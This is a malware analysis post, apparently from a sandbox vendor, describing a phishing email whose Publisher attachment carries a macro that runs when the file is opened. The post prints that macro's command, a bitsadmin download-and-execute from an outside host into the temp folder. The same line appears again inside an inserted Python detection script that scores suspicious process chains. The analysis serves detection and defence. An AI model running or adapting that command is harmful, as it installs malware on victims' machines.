
Analyzing Malware Embedded in MS Publisher Files

We have started to see malware authors embed Visual Basic for Applications (VBA) macros in many unconventional file types to attack hosts. In response to this trend, VMRay Analyzer V 2.0 now supports the analysis of Microsoft Access and Microsoft Publisher files. Supporting additional sample types means greater coverage of the attack surface, which in turn means greater detection capability.

In this post, we review the analysis of a Publisher file associated with an email from service@paypal.com. The attached file (shown in Figure 1) is disguised as a payment receipt and is titled “FD-Rechnung.pub”.

Figure 1: Email with the malicious MS Publisher attachment

Analysis

We first drag and drop the email attachment into the VMRay Cloud where it is immediately recognized as a ‘Microsoft Publisher Document’. On completing the analysis, VMRay Analyzer assigns a severity label of ‘Malicious’ to the sample (Figure 2).

Figure 2: ‘Sample view’ screen showing sample type and severity

A look at the Overview shows an unusual process tree (see Figure 3). Normally the Microsoft Publisher application (mspub.exe) opens the document and is the only associated process. However, in this case, several other processes are invoked.

Figure 3: Unusual Process Tree

After opening the document the following command is executed:

cmd.exe /c bitsadmin /transfer myjob /download
/priority FOREGROUND "hxxp://www.doorasope.top/read.php?f=1.gif"
"%temp%\ltesih.jpg" >nul & "%temp%\ltesih.jpg" & exit

This command is hidden inside the Publisher document as an embedded VBA macro, which is highly obfuscated and normally hard to extract. Figure 4 shows the macro triggering through the “Document_Open()” function when the document is opened.

Figure 4: Highly obfuscated VBA macro embedded in the sample

Since VMRay Analyzer monitors every process, we can extract and see the command that is executed after the document is opened (Figure 5). The bitsadmin tool from Microsoft is used to download a file, save it into the Windows temporary folder and then execute it. The downloaded file can be a Trojan, Ransomware or any other malicious file that the malware author wants to use in the attack. In this analysis, the downloaded file is very likely a Trojan/Bot that first connects to multiple C&Cs (command and control servers).
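The command above and the behaviors the post attributes to it (a Publisher host spawning a shell, a BITS download into the temporary folder, and immediate execution of the dropped file under a non-executable extension) are exactly the kind of chain a process-creation log lets a defender flag. The following Python example is added here and is not VMRay code; it parses constructed process-creation events (parent image, child image, command line), extracts the URL and destination from a `bitsadmin /transfer` command line, and scores the chain. The first event reuses the command line quoted in this post; the other two events, the image names and the scoring thresholds are constructed for the example.

```python
import re
from dataclasses import dataclass

# Office/productivity hosts that should not normally spawn a command shell.
OFFICE_HOSTS = {"mspub.exe", "winword.exe", "excel.exe", "powerpnt.exe", "msaccess.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
TEMP_MARKERS = ("%temp%", "\\appdata\\local\\temp\\", "\\windows\\temp\\")
EXEC_EXTS = {".exe", ".dll", ".scr", ".bat", ".cmd", ".ps1", ".vbs", ".js", ".hta"}

# bitsadmin /transfer <job> [/download] [/priority X] <remote URL> <local path>
# Capture everything up to the next command separator (& or |).
BITSADMIN_RE = re.compile(r"bitsadmin(?:\.exe)?\s+/transfer\s+(?P<args>[^&|]+)", re.IGNORECASE)
TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')  # quoted token or bare token


@dataclass(frozen=True)
class ProcessEvent:
    parent: str   # image name of the parent process, e.g. mspub.exe
    image: str    # image name of the created process
    cmdline: str  # full command line of the created process


def _tokens(s):
    """Split a Windows command fragment into tokens, honouring double quotes."""
    return [q if q else bare for q, bare in TOKEN_RE.findall(s)]


def _ext(path):
    """Lower-cased extension of the final path component, or '' if none."""
    base = path.rsplit("\\", 1)[-1].rsplit("/", 1)[-1].split("?", 1)[0]
    return ("." + base.rsplit(".", 1)[1].lower()) if "." in base else ""


def parse_bitsadmin(cmdline):
    """Return (url, local_path) for a bitsadmin /transfer job in cmdline, else None."""
    m = BITSADMIN_RE.search(cmdline)
    if not m:
        return None
    toks = _tokens(m.group("args"))
    # The URL is the first token that looks like http(s) or defanged hxxp(s).
    urls = [i for i, t in enumerate(toks) if re.match(r"h(?:tt|xx)ps?://", t, re.I)]
    if not urls or urls[0] + 1 >= len(toks):
        return None
    return toks[urls[0]], toks[urls[0] + 1]


def _executed_later(cmdline, path):
    """True if `path` is itself launched in a later segment chained with & or &&."""
    for seg in re.split(r"&+", cmdline):
        toks = _tokens(seg)
        if toks and toks[0].lower() == path.lower():
            return True
    return False


def analyze(event):
    """Return the list of behavioural findings for one process-creation event."""
    findings = []
    parent, image = event.parent.lower(), event.image.lower()
    if parent in OFFICE_HOSTS and image in SHELLS:
        findings.append(f"office_spawns_shell: {parent} -> {image}")
    dl = parse_bitsadmin(event.cmdline)
    if dl:
        url, dest = dl
        findings.append(f"bitsadmin_download: {url} -> {dest}")
        if any(marker in dest.lower() for marker in TEMP_MARKERS):
            findings.append(f"drops_to_temp: {dest}")
        if _executed_later(event.cmdline, dest):
            findings.append(f"downloaded_file_executed: {dest}")
            if _ext(dest) not in EXEC_EXTS:
                # A .jpg/.gif that is run as a program is a payload hiding behind a benign name.
                findings.append(f"executable_masquerade: runs '{_ext(dest)}' file as a program")
    return findings


def verdict(findings):
    """Constructed thresholds: three or more indicators on one event is treated as malicious."""
    return "malicious" if len(findings) >= 3 else ("suspicious" if findings else "clean")


SAMPLE_EVENTS = [
    # Command line quoted in the post, with the parent/child pairing the process tree shows.
    ProcessEvent("mspub.exe", "cmd.exe",
                 'cmd.exe /c bitsadmin /transfer myjob /download /priority FOREGROUND '
                 '"hxxp://www.doorasope.top/read.php?f=1.gif" "%temp%\\ltesih.jpg" >nul '
                 '& "%temp%\\ltesih.jpg" & exit'),
    # Constructed: an operator fetching an installer with BITS; no Office parent, no temp path, no chained run.
    ProcessEvent("explorer.exe", "cmd.exe",
                 'cmd.exe /c bitsadmin /transfer patch /download /priority NORMAL '
                 '"https://updates.example/agent.msi" "C:\\Users\\admin\\Downloads\\agent.msi"'),
    # Constructed: Publisher launching the 64-bit print spooler helper, a normal child process.
    ProcessEvent("mspub.exe", "splwow64.exe", "C:\\Windows\\splwow64.exe 12288"),
]


def triage(events=SAMPLE_EVENTS):
    """Score every event; returns (parent, image, verdict, findings) per event."""
    return [(e.parent, e.image, verdict(analyze(e)), analyze(e)) for e in events]


if __name__ == "__main__":
    for parent, image, label, findings in triage():
        print(f"{parent} -> {image}: {label}")
        for f in findings:
            print("   ", f)
```

The scoring deliberately keys on the combination rather than on `bitsadmin` alone: BITS is a legitimate administration tool, so the second event is only flagged as suspicious, while the Publisher-spawned chain that drops into `%temp%` and runs a `.jpg` trips all five indicators.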

Figure 5: Network view showing sample file’s connection to remote hosts

Conclusion

The Microsoft Publisher file format may not be the most popular choice for malware authors, but this sample shows that no file format can be considered safe and free of malicious content. Malware detection and analysis solutions need to offer broader coverage of the attack surface by supporting these sample types.

In this analysis, the VTI Score (shown in Figure 6) shows that the Publisher document executes Visual Basic, creates processes and drops files to the system – all of which constitute suspicious behavior.

Figure 6: VTI Score

Malware authors use several methods to try to evade detection and analysis systems. Using lesser-known or infrequently used file types is one such technique. However, the research team at VMRay is ready to deal with these evasion techniques.
